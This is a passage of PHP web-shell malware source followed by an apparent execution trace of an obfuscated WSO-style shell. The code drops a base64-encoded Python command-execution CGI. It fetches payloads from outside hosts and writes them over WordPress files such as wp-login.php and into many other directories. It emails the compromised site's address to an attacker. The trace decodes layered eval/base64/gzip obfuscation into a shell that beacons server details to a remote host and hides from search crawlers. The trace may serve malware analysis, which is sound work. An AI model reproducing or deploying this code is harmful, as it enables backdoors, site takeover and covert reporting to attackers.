\$dosya , \$metin ) ;\r\n fclose (\$dosya);\r\n \$pythonp = 'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8
gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZ
vcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';\r\n \$file = fopen(\"python.r00t\" ,\"w+\");\r\n \$write = fwrite (\$file ,base64_decode(\$pythonp));\r\n fclose(\$file);\r\n chmod(\"python.r00t\",0755);\r\n echo \"<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> \";\r\n printFooter();\r\n } if( empty(\$_POST['a']) ) if(isset(\$default_action) && function_exists('action' . \$default_action)) \$_POST['a'] = \$default_action;\r\n else \$_POST['a'] = 'SecInfo';\r\n if( !empty(\$_POST['a']) && function_exists('action' . \$_POST['a']) ) call_user_func('action' . 
\$_POST['a']);\r\n \r\n?>\r\n<?php if(\$_POST['query']){ \$veriyfy = stripslashes(stripslashes(\$_POST['query']));\r\n \$data = \"data.txt\";\r\n @touch (\"data.txt\");\r\n \$ver = @fopen (\$data , 'w');\r\n @fwrite ( \$ver , \$veriyfy ) ;\r\n @fclose (\$ver);\r\n }else{ \$datas=@fopen(\"data.txt\",'r');\r\n \$i=0;\r\n while (\$i <= 5) { \$i++;\r\n \$blue=@fgets(\$datas,1024);\r\n echo \$blue;\r\n } } \$datasi=@fopen(\"js/js.php\",'r');\r\n if(\$datasi){ }else{ @mkdir(\"js\");\r\n \$dos = file_get_contents(\"http://phpshell.in/txt/lamer.txt\");\r\n \$data = \"js/js.php\";\r\n @touch (\"js/js.php\");\r\n \$ver = @fopen (\$data , 'w');\r\n @fwrite ( \$ver , \$dos ) ;\r\n @fclose (\$ver);\r\n \$yol = \"http://\".\$_SERVER['HTTP_HOST'].\"\".\$_SERVER['REQUEST_URI'].\"\";\r\n \$y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.\$yol.'<br/>Sender Yolu : js/js.php</h1>';\r\n \$header .= \"From: SheLL Boot <suppor@nic.org>\\n\";\r\n \$header .= \"Content-Type: text/html;\r\n charset=utf-8\\n\";\r\n @mail(\"byhero44@gmail.com\", \"Hacklink Bildiri\", \"\$y\", \$header);\r\n @mail(\"byhero44@gmail.com\", \"Hacklink Bildiri\", \"\$y\", \$header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get(\$url){\r\n\$im = curl_init(\$url);\r\ncurl_setopt(\$im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt(\$im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt(\$im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt(\$im, CURLOPT_HEADER, 0);\r\nreturn curl_exec(\$im);\r\ncurl_close(\$im);\r\n}\r\n\$check1 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-includes/js/js.php\" ;\r\n\$text1 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1 = fopen(\$check1, 'w');\r\nfwrite(\$open1, \$text1);\r\nfclose(\$open1);\r\nif(file_exists(\$check1)){\r\n}\r\n\$check12 = \$_SERVER['DOCUMENT_ROOT'] . 
\"/wp-includes/index.php\" ;\r\n\$text12 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12 = fopen(\$check12, 'w');\r\nfwrite(\$open12, \$text12);\r\nfclose(\$open12);\r\nif(file_exists(\$check12)){\r\n}\r\n\$check123 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/images/images.php\" ;\r\n\$text123 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123 = fopen(\$check123, 'w');\r\nfwrite(\$open123, \$text123);\r\nfclose(\$open123);\r\nif(file_exists(\$check123)){\r\n}\r\n\$check12345 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/css/css.php\" ;\r\n\$text12345 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345 = fopen(\$check12345, 'w');\r\nfwrite(\$open12345, \$text12345);\r\nfclose(\$open12345);\r\nif(file_exists(\$check12345)){\r\n}\r\n\$check123456 = \$_SERVER['DOCUMENT_ROOT'] . \"/adm.php\" ;\r\n\$text123456 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123456 = fopen(\$check123456, 'w');\r\nfwrite(\$open123456, \$text123456);\r\nfclose(\$open123456);\r\nif(file_exists(\$check123456)){\r\n}\r\n\$check1234567 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/css.php\" ;\r\n\$text1234567 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567 = fopen(\$check1234567, 'w');\r\nfwrite(\$open1234567, \$text1234567);\r\nfclose(\$open1234567);\r\nif(file_exists(\$check1234567)){\r\n}\r\n\$check12345678 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/install.php\" ;\r\n\$text12345678 = http_get('http://byr00t.co/txt/tools.txt');\r\n\$open12345678 = fopen(\$check12345678, 'w');\r\nfwrite(\$open12345678, \$text12345678);\r\nfclose(\$open12345678);\r\nif(file_exists(\$check12345678)){\r\n}\r\n\$check123456789 = \$_SERVER['DOCUMENT_ROOT'] . \"/cgi-bin/css.php\" ;\r\n\$text123456789 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123456789 = fopen(\$check123456789, 'w');\r\nfwrite(\$open123456789, \$text123456789);\r\nfclose(\$open123456789);\r\nif(file_exists(\$check123456)){\r\n}\r\n\$check12345678910 = \$_SERVER['DOCUMENT_ROOT'] . 
\"/js/css.php\" ;\r\n\$text12345678910 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345678910 = fopen(\$check12345678910, 'w');\r\nfwrite(\$open12345678910, \$text12345678910);\r\nfclose(\$open12345678910);\r\nif(file_exists(\$check123456)){\r\n}\r\n\$check1234567891011 = \$_SERVER['DOCUMENT_ROOT'] . \"/css/css.php\" ;\r\n\$text1234567891011 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567891011 = fopen(\$check1234567891011, 'w');\r\nfwrite(\$open123, \$text1234567891011);\r\nfclose(\$open1234567891011);\r\nif(file_exists(\$check1234567891011)){\r\n}\r\n\$check123456789101112 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-login.php\" ;\r\n\$text123456789101112 = http_get('http://phpshell.in/txt/seo.txt');\r\n\$open123456789101112= fopen(\$check123456789101112, 'w');\r\nfwrite(\$open123456789101112, \$text123456789101112);\r\nfclose(\$open123456789101112);\r\nif(file_exists(\$check123456789101112)){\r\n}\r\n\$check12345678910111213 = \$_SERVER['DOCUMENT_ROOT'] . \"/images/css.php\" ;\r\n\$textk12345678910111213 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$openk12345678910111213 = fopen(\$checkk12345678910111213, 'w');\r\nfwrite(\$openk12345678910111213, \$textk12345678910111213);\r\nfclose(\$openk12345678910111213);\r\nif(file_exists(\$checkk12345678910111213)){\r\n}\r\n\$check1234567891011121314 = \$_SERVER['DOCUMENT_ROOT'] . \"/img/css.php\" ;\r\n\$text1234567891011121314 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567891011121314 = fopen(\$checkk1234567891011121314, 'w');\r\nfwrite(\$open1234567891011121314, \$text1234567891011121314);\r\nfclose(\$open1234567891011121314);\r\nif(file_exists(\$check1234567891011121314)){\r\n}\r\n\$check123456789101112131415 = \$_SERVER['DOCUMENT_ROOT'] . 
\"/modules/css.php\" ;\r\n\$text123456789101112131415 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123456789101112131415 = fopen(\$check123456789101112131415, 'w');\r\nfwrite(\$open123456789101112131415, \$text123456789101112131415);\r\nfclose(\$open123456789101112131415);\r\nif(file_exists(\$check123456789101112131415)){\r\n}\r\n\$check12345678910111213141516 = \$_SERVER['DOCUMENT_ROOT'] . \"/includes/css.php\" ;\r\n\$text12345678910111213141516 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345678910111213141516 = fopen(\$check12345678910111213141516, 'w');\r\nfwrite(\$open12345678910111213141516, \$text12345678910111213141516);\r\nfclose(\$open12345678910111213141516);\r\nif(file_exists(\$check12345678910111213141516)){\r\n}\r\n\$check1234567891011121314151617 = \$_SERVER['DOCUMENT_ROOT'] . \"/phpinfo.php\" ;\r\n\$text1234567891011121314151617 = http_get('http://phpshell.in/txt/phpinfo.txt');\r\n\$open1234567891011121314151617 = fopen(\$check1234567891011121314151617, 'w');\r\nfwrite(\$open1234567891011121314151617, \$text1234567891011121314151617);\r\nfclose(\$open1234567891011121314151617);\r\nif(file_exists(\$check1234567891011121314151617)){\r\n}\r\n\$check123456789101112131415161718 = \$_SERVER['DOCUMENT_ROOT'] . \"/.well-known/css.php\" ;\r\n\$textk123456789101112131415161718 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$openk123456789101112131415161718 = fopen(\$checkk123456789101112131415161718, 'w');\r\nfwrite(\$openk123456789101112131415161718, \$textk123456789101112131415161718);\r\nfclose(\$openk123456789101112131415161718);\r\nif(file_exists(\$checkk123456789101112131415161718)){\r\n}\r\n\$checkk12345678910111213141516171819 = \$_SERVER['DOCUMENT_ROOT'] . 
\"/sites/css.php\" ;\r\n\$text12345678910111213141516171819 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345678910111213141516171819 = fopen(\$check12345678910111213141516171819, 'w');\r\nfwrite(\$open12345678910111213141516171819, \$text12345678910111213141516171819);\r\nfclose(\$open12345678910111213141516171819);\r\nif(file_exists(\$check12345678910111213141516171819)){\r\n}\r\n\$check1234567891011121314151617181920 = \$_SERVER['DOCUMENT_ROOT'] . \"/tmp/css.php\" ;\r\n\$text1234567891011121314151617181920 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567891011121314151617181920 = fopen(\$check1234567891011121314151617181920, 'w');\r\nfwrite(\$open1234567891011121314151617181920, \$text1234567891011121314151617181920);\r\nfclose(\$open1234567891011121314151617181920);\r\nif(file_exists(\$check1234567891011121314151617181920)){\r\n}\r\n?>\r\n");

Execution traces

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676239751.5135.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:09:37.411291]
1	0	1	0.000141	393608
1	3	0	0.000369	427040	{main}	1		/var/www/html/uploads/wso1.php.suspected	0	0
1		A						/var/www/html/uploads/wso1.php.suspected	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/wso1.php.suspected	3	$stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2	4	0	0.000451	427040	base64_decode	0		/var/www/html/uploads/wso1.php.suspected	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000470	427200
2	5	0	0.000491	427168	gzinflate	0		/var/www/html/uploads/wso1.php.suspected	4	1	'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	1	0.000513	427296
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	0	0.000531	427136	htmlspecialchars_decode	0		/var/www/html/uploads/wso1.php.suspected	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000550	427168
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000609	428712	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/wso1.php.suspected	4	0
3	8	0	0.000629	428712	strrev	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	1	'==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3	8	1	0.000681	461512
3	8	R			'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	0	0.000727	461480	base64_decode	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	1	'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	1	0.000843	494280
3	10	0	0.001290	461480	gzinflate	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	1	'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	1	0.001752	486088
3	11	0	0.002199	453288	gzuncompress	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	1	'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	1	0.002948	539336
3	11	R			'<?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3	12	0	0.006065	1144192	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n 